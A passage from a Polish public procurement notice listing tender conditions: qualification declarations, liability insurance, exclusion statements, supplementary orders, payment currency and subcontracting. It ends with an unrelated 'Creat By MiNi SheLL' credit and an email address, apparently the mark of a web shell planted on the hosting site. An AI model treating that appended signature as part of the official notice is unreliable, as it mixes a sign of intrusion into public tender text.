e) oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień załącznik nr 3b do SIWZ,

f) opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że 
  wykonawca   jest ubezpieczony od odpowiedzialności cywilnej w zakresie 
 prowadzonej działalności  związanej z przedmiotem zamówienia w kwocie    
 minimum 15 tys. zł .

Pkt. 6.2. SIWZ W celu wykazania braku podstaw do wykluczenia Wykonawcy z  
      postępowania o udzielenie zamówienia (art. 24 ust. 1 ustawy ) oferta 
      winna zwierać:

a) Oświadczenie o braku podstaw do wykluczenia z art. 24 ust. 1 ustawy PZP wg  wzoru, stanowiącego załącznik nr 4,

Inne postanowienia SIWZ

Pkt. 18.1. SIWZ Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o   
 których mowa w art. 67 ust. 1 pkt. 6 ustawy, polegających na powtórzeniu prac   
 będących przedmiotem zamówienia lub jego części o wartości do 50% 
 wartości zamówienia podstawowego (wartości umowy) w okresie 3 lat od 
 udzielenia zamówienia podstawowego (od terminu podpisania umowy).  
 Zamówienie uzupełniające dotyczy prac ujętych w SIWZ.

Pkt. 18.2. SIWZ Rozliczenia między zamawiającym, a wykonawcą będą prowadzone w walucie 
 polskiej.

Pkt. 18.3. SIWZ Zamawiający żąda wskazania przez wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom, przy czym dopuszczalne jest  powierzenie podwykonawcą  całości prac..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com